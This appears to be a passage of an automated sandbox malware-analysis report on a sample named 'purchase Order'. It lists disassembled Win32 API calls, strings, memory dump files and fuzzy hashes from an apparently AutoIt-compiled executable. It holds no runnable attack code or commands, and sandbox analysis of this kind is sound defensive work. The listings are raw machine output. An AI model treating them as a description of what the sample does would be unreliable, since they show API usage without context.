                                                        • _wcscat.LIBCMT ref: 00C86DE0
                                                        • _wcscat.LIBCMT ref: 00C86DE7
                                                        • _wcsncpy.LIBCMT ref: 00C86E12
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                        • API String ID: 699586101-1459072770
                                                        • Opcode ID: 20ee47359409fa81902477d863c6cd56561e513c2ee16a1e91123d91e0036201
                                                        • Instruction ID: 274cd59dd8013c008d5d2e0f9ff47ed13467793071f6497f7ada98779112a6df
                                                        • Opcode Fuzzy Hash: 20ee47359409fa81902477d863c6cd56561e513c2ee16a1e91123d91e0036201
                                                        • Instruction Fuzzy Hash: 6841E771A00204BBE711BB64CD87EBF777CEF41714F14003AFA01A2192FB749A01A7A6
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C5A939
                                                        • GetSystemMetrics.USER32(00000007), ref: 00C5A941
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C5A96C
                                                        • GetSystemMetrics.USER32(00000008), ref: 00C5A974
                                                        • GetSystemMetrics.USER32(00000004), ref: 00C5A999
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C5A9B6
                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00C5A9C6
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C5A9F9
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C5AA0D
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00C5AA2B
                                                        • GetStockObject.GDI32(00000011), ref: 00C5AA47
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C5AA52
                                                          • Part of subcall function 00C5B63C: GetCursorPos.USER32(000000FF), ref: 00C5B64F
                                                          • Part of subcall function 00C5B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00C5B66C
                                                          • Part of subcall function 00C5B63C: GetAsyncKeyState.USER32(00000001), ref: 00C5B691
                                                          • Part of subcall function 00C5B63C: GetAsyncKeyState.USER32(00000002), ref: 00C5B69F
                                                        • SetTimer.USER32(00000000,00000000,00000028,00C5AB87), ref: 00C5AA79
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: @U=u$AutoIt v3 GUI
                                                        • API String ID: 1458621304-2077007950
                                                        • Opcode ID: 512df4e780396b3d66109ca128774cd4b83464e411dbd840a9b951da70a8ff8e
                                                        • Instruction ID: 08daeff111b3ec025aed4834c72c0be597b7a42674578c58731c32ab03bfc290
                                                        • Opcode Fuzzy Hash: 512df4e780396b3d66109ca128774cd4b83464e411dbd840a9b951da70a8ff8e
                                                        • Instruction Fuzzy Hash: 4CB18C79A0020A9FDB14DFA9CC45BEE7BB4FB08315F114229FA16E7290DB70D980DB55
                                                        APIs
                                                        • LoadIconW.USER32(00000063), ref: 00C7EAB0
                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C7EAC2
                                                        • SetWindowTextW.USER32(?,?), ref: 00C7EAD9
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00C7EAEE
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00C7EAF4
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00C7EB04
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00C7EB0A
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C7EB2B
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C7EB45
                                                        • GetWindowRect.USER32(?,?), ref: 00C7EB4E
                                                        • SetWindowTextW.USER32(?,?), ref: 00C7EBB9
                                                        • GetDesktopWindow.USER32 ref: 00C7EBBF
                                                        • GetWindowRect.USER32(00000000), ref: 00C7EBC6
                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C7EC12
                                                        • GetClientRect.USER32(?,?), ref: 00C7EC1F
                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C7EC44
                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C7EC6F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                        • String ID: @U=u
                                                        • API String ID: 3869813825-2594219639
                                                        • Opcode ID: 4ec89e722f6dd367302650737fdf8c2839afc85f98f06b0f7fe7e1319fcfbba7
                                                        • Instruction ID: a1d870ea9aec5828ce41aa0c86000ceb92c1f4d91e4b79449d50b0a4406a9d40
                                                        • Opcode Fuzzy Hash: 4ec89e722f6dd367302650737fdf8c2839afc85f98f06b0f7fe7e1319fcfbba7
                                                        • Instruction Fuzzy Hash: 95513D71900709AFDB20DFA8CD89F6EBBF5FF08704F008968E597A26A0C774A944DB10
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$Foreground
                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                        • API String ID: 62970417-1919597938
                                                        • Opcode ID: e3f93af12d021f2beda68af418f8afcfca7295b9c5cbf473e1a326f30f07c0fa
                                                        • Instruction ID: 89fd34236d21647bc3d563a4a3430180de1e73c6805c376b643dea27cc293c93
                                                        • Opcode Fuzzy Hash: e3f93af12d021f2beda68af418f8afcfca7295b9c5cbf473e1a326f30f07c0fa
                                                        • Instruction Fuzzy Hash: FDD1E9305083469BCB04EF51C481AEEBBB4FF54354F404A1DF8A6975A1DB30FA9ADB92
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00CA6C56
                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CA6D16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                        • API String ID: 3974292440-1753161424
                                                        • Opcode ID: 9e9c38859e116fa5f30f2327bf8aab74bdaf3eebf5b69d7f8fe42ce4b2e19b63
                                                        • Instruction ID: 6518a0920cbd2439f776b6b41cf047287b592f5c42ae77b38b36ef310b4805a9
                                                        • Opcode Fuzzy Hash: 9e9c38859e116fa5f30f2327bf8aab74bdaf3eebf5b69d7f8fe42ce4b2e19b63
                                                        • Instruction Fuzzy Hash: E8A18F342043469FCB18EF20C851A6AB3A5FF45358F14896CF9A65B3D2DB70EE0ADB41
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00CAE754
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00CAE76B
                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00CAE776
                                                        • CloseHandle.KERNEL32(00000000), ref: 00CAE783
                                                        • GlobalLock.KERNEL32(00000000), ref: 00CAE78C
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00CAE79B
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00CAE7A4
                                                        • CloseHandle.KERNEL32(00000000), ref: 00CAE7AB
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00CAE7BC
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CCD9BC,?), ref: 00CAE7D5
                                                        • GlobalFree.KERNEL32(00000000), ref: 00CAE7E5
                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00CAE809
                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00CAE834
                                                        • DeleteObject.GDI32(00000000), ref: 00CAE85C
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CAE872
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID: @U=u
                                                        • API String ID: 3840717409-2594219639
                                                        • Opcode ID: 5a7df12866e06831797afbd5b5d6b90c94c38ff7d090f4eee3a2608a1322b44a
                                                        • Instruction ID: 0b06ce8bf9861ee4270400bf668be17983e2625a686ada1a7b32b1ae1721f8d4
                                                        • Opcode Fuzzy Hash: 5a7df12866e06831797afbd5b5d6b90c94c38ff7d090f4eee3a2608a1322b44a
                                                        • Instruction Fuzzy Hash: 77412875600205EFDB119F65DC88FAEBBB8EF8A715F108068F916D72A0D734AE41DB60
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CA3735
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CDDC00,00000000,?,00000000,?,?), ref: 00CA37A3
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CA37EB
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CA3874
                                                        • RegCloseKey.ADVAPI32(?), ref: 00CA3B94
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CA3BA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: ca1e0fdfba3d8c7742ad0c989bbc1ff62b1c6fa5cd4ae83f0db57cd3620ce032
                                                        • Instruction ID: b490be67050e7a549a8a24ed40d7b7fc2ed4dd350508999ef5d361248e437726
                                                        • Opcode Fuzzy Hash: ca1e0fdfba3d8c7742ad0c989bbc1ff62b1c6fa5cd4ae83f0db57cd3620ce032
                                                        • Instruction Fuzzy Hash: B8026A752006119FCB14EF28C895A2EB7E5FF89724F04845DF99A9B3A1CB30EE41DB85
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C7CF91
                                                        • __swprintf.LIBCMT ref: 00C7D032
                                                        • _wcscmp.LIBCMT ref: 00C7D045
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C7D09A
                                                        • _wcscmp.LIBCMT ref: 00C7D0D6
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00C7D10D
                                                        • GetDlgCtrlID.USER32(?), ref: 00C7D15F
                                                        • GetWindowRect.USER32(?,?), ref: 00C7D195
                                                        • GetParent.USER32(?), ref: 00C7D1B3
                                                        • ScreenToClient.USER32(00000000), ref: 00C7D1BA
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C7D234
                                                        • _wcscmp.LIBCMT ref: 00C7D248
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00C7D26E
                                                        • _wcscmp.LIBCMT ref: 00C7D282
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                        • String ID: %s%u
                                                        • API String ID: 3119225716-679674701
                                                        • Opcode ID: bc7593fcdabaed1917a06a86f4286d8f8ec636a5a7688ed760f8f03b49aec76a
                                                        • Instruction ID: 079735b3dc1192f0c54ecadbec1bc6d90b84c671ad892af639398933bf812d45
                                                        • Opcode Fuzzy Hash: bc7593fcdabaed1917a06a86f4286d8f8ec636a5a7688ed760f8f03b49aec76a
                                                        • Instruction Fuzzy Hash: D1A1A171604306AFD715DF64C884FAAB7A8FF44354F048929F9AED2191EB30EE46CB91
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00C7D8EB
                                                        • _wcscmp.LIBCMT ref: 00C7D8FC
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C7D924
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00C7D941
                                                        • _wcscmp.LIBCMT ref: 00C7D95F
                                                        • _wcsstr.LIBCMT ref: 00C7D970
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00C7D9A8
                                                        • _wcscmp.LIBCMT ref: 00C7D9B8
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C7D9DF
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00C7DA28
                                                        • _wcscmp.LIBCMT ref: 00C7DA38
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00C7DA60
                                                        • GetWindowRect.USER32(00000004,?), ref: 00C7DAC9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: 8ad72ebaa8a54d9da29d34b861580c7221c3a621a22a8cc2404148eed31a2250
                                                        • Instruction ID: 536ff3f091f5a699125e206e4bce954c1aa992801243eb71abf9121a2b46453c
                                                        • Opcode Fuzzy Hash: 8ad72ebaa8a54d9da29d34b861580c7221c3a621a22a8cc2404148eed31a2250
                                                        • Instruction Fuzzy Hash: AF819F310083059BDB11DF54C885FAA7BE8FF84714F08846AFD9E9A096DB30DE46DBA1
                                                        APIs
                                                        • _memset.LIBCMT ref: 00CACEFB
                                                        • DestroyWindow.USER32(?,?), ref: 00CACF73
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CACFF4
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CAD016
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CAD025
                                                        • DestroyWindow.USER32(?), ref: 00CAD042
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C40000,00000000), ref: 00CAD075
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CAD094
                                                        • GetDesktopWindow.USER32 ref: 00CAD0A9
                                                        • GetWindowRect.USER32(00000000), ref: 00CAD0B0
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CAD0C2
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CAD0DA
                                                          • Part of subcall function 00C5B526: GetWindowLongW.USER32(?,000000EB), ref: 00C5B537
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                        • String ID: 0$@U=u$tooltips_class32
                                                        • API String ID: 3877571568-1130792468
                                                        • Opcode ID: e7dc5184997c5f731d9e3bb75bd7aeb525b85b30c3fb25c67a832a6c465b2cab
                                                        • Instruction ID: e0332049e0ac4d59f22e7f7779af08e9d4db7201c4fe66ecda20ed8f7a2911e3
                                                        • Opcode Fuzzy Hash: e7dc5184997c5f731d9e3bb75bd7aeb525b85b30c3fb25c67a832a6c465b2cab
                                                        • Instruction Fuzzy Hash: 9971ACB4140306AFD720CF28CC85FAA77F5EB89708F44451DF996872A1DB75EA42DB22
                                                        APIs
                                                          • Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F
                                                        • DragQueryPoint.SHELL32(?,?), ref: 00CAF37A
                                                          • Part of subcall function 00CAD7DE: ClientToScreen.USER32(?,?), ref: 00CAD807
                                                          • Part of subcall function 00CAD7DE: GetWindowRect.USER32(?,?), ref: 00CAD87D
                                                          • Part of subcall function 00CAD7DE: PtInRect.USER32(?,?,00CAED5A), ref: 00CAD88D
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00CAF3E3
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CAF3EE
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CAF411
                                                        • _wcscat.LIBCMT ref: 00CAF441
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CAF458
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00CAF471
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00CAF488
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00CAF4AA
                                                        • DragFinish.SHELL32(?), ref: 00CAF4B1
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CAF59C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                                        • API String ID: 169749273-762882726
                                                        • Opcode ID: 0ae03d5781d5d3e7a0e91a5f95a3adf4de047e749e2352b09dd7e28108af6b89
                                                        • Instruction ID: 2c26071dd5e96b792b3fb5d6d636fdd4f327489497d48afe13b17d0898ebea27
                                                        • Opcode Fuzzy Hash: 0ae03d5781d5d3e7a0e91a5f95a3adf4de047e749e2352b09dd7e28108af6b89
                                                        • Instruction Fuzzy Hash: E9614B71108305AFC305EF64CC85E9FBBE8FF89714F400A2DF696921A1DB709A09DB52
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: 9ade74606ea2be699dff2106908e27183168b4e035fada99fdc2f3a7844b05e5
                                                        • Instruction ID: 6efb0f0f1dadc816772d473c80b645321c7c51dda9314c007f7b96e28633bbb6
                                                        • Opcode Fuzzy Hash: 9ade74606ea2be699dff2106908e27183168b4e035fada99fdc2f3a7844b05e5
                                                        • Instruction Fuzzy Hash: 4C316D31644209ABDB68FA50DD83EEEB3B4AF20711F204139F957710E9EB61AF04E653
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00C979C6
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00C979D1
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00C979DC
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00C979E7
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00C979F2
                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00C979FD
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00C97A08
                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00C97A13
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00C97A1E
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00C97A29
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00C97A34
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00C97A3F
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00C97A4A
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00C97A55
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00C97A60
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00C97A6B
                                                        • GetCursorInfo.USER32(?), ref: 00C97A7B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
